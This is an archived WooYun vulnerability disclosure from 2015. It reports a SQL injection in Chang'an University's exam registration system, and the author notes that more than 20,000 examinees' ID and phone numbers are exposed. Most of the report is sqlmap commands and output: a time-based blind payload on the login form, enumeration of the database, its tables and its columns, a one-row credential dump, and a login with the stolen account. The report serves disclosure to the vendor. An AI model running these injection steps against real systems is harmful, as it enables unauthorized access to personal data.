乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-22: 细节已通知厂商并且等待厂商处理中 2015-09-23: 厂商已经确认,细节仅向厂商公开 2015-10-03: 细节向核心白帽子及相关领域专家公开 2015-10-13: 细节向普通白帽子公开 2015-10-23: 细节向实习白帽子公开 2015-11-07: 细节向公众公开
全国专业技术人员计算机能力考试——长安大学考点报名系统2w+考生敏感信息泄露(包括身份证和手机号等)。
http://**.**.**.**:8080/bmxt/
D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**:8080/bmxt/UserCl?method=0&sign=0" --data "username=123456&password=123456&Submit=%B5%C7%C2%BC" --batch _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150919}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _| |_| |_| http://**.**.**.**Parameter: username (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: username=123456' AND (SELECT * FROM (SELECT(SLEEP(5)))jRnE) AND 'gUcO'='gUcO&password=123456&Submit=%B5%C7%C2%BC---[23:43:51] [INFO] the back-end DBMS is MySQLweb application technology: JSPback-end DBMS: MySQL 5.0.12
D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**:8080/bmxt/UserCl?method=0&sign=0" --data "username=123456&password=123456&Submit=%B5%C7%C2%BC" --dbs --batch _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150919}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _| |_| |_| http://**.**.**.**available databases [5]:[*] bmxt[*] information_scheqa[*] mysql[*] performance_schema[*] tqst
D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**:8080/bmxt/UserCl?method=0&sign=0" --data "username=123456&password=123456&Submit=%B5%C7%C2%BC" -D bmxt --tables --batch _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150919}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _| |_| |_| http://**.**.**.**Database: bmxt[9 tables]+----------+| user || ad || admin || class || discuss || e1 || examtime || zheqgce || ziliao |+----------+
D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**:8080/bmxt/UserCl?method=0&sign=0" --data "username=123456&password=123456&Submit=%B5%C7%C2%BC" -D bmxt -T admin --columns --batch _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150919}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _| |_| |_| http://**.**.**.**Database: bmxtTable: admin[10 columns]+-----------------+-------------+| Column | Type |+-----------------+-------------+| adminname | varchar(20) || fqe_manage || gonggao_manage | varchar(5) || id | int(11) || mqssage_manage || password | varchar(20) || stu_date_mqnage || stu_manage | varchar(5) || sys_manage | varchar(5) || user_manage | varchar(5) |+-----------------+-------------+
D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**:8080/bmxt/UserCl?methd=0&sign=0" --data "username=123456&password=123456&Submit=%B5%C7%C2%BC" -D bmx -T user --columns --batch _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150919}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _| |_| |_| http://**.**.**.**Database: bmxtTable: user[33 columns]+-------------+-------------+| Column | Type |+-------------+-------------+| a1 | varchar(50) || a2 | varchar(50) || a3 | varchar(50) || a4 | varchar(50) || a5 | varchar(50) || a6 | varchar(50) || a7 | varchar(50) || address | varchar(50) || admin | varchar(50) || b1 | varchar(50) || b2 | varchar(50) || b3 | varchar(50) || b4 | varchar(50) || b5 | varchar(50) || b6 | varchar(50) || b7 | varchar(50) || baddress | varchar(50) || bk | varchar(50) || checkfee | int(11) || degree | varchar(50) || del | int(11) || dnum | varchar(50) || email | varchar(50) || examDate | varchar(50) || id | int(11) || identify_id | varchar(50) || password | varchar(50) || picname | varchar(50) || postcode | varchar(50) || telphone | varchar(50) || truename | varchar(50) || username | varchar(50) || yes | int(1) |+-------------+-------------+
D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**:8080/bmxt/UserCl?method=0&sign=0" --data "username=123456&password=123456&Submit=%B5%C7%C2%BC" --count -D bmxt -T user –C "username,password"--batch _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150919}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _| |_| |_| http://**.**.**.**[12:31:58] [INFO] resumed: 22171Database: bmxt+--------+---------+| Table | Entries |+--------+---------+| `user` | 22171 |+--------+---------+
数据量太多了,只导一个看看。
D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**:8080/bmxt/UserCl?method=0&sign=0" --data "username=123456&password=123456&Submit=%B5%C7%C2%BC" -D bmxt -T user –C "username,password" --stop 1 --dump --batch _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150919}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _| |_| |_| http://**.**.**.**
拿到了账号和密码,试试看。
成功登陆了,信息很丰富,被利用的话,很危险。
希望长安大学尽快修复,对考生负责。
危害等级:中
漏洞Rank:6
确认时间:2015-09-23 08:26
通知用户处理中
暂无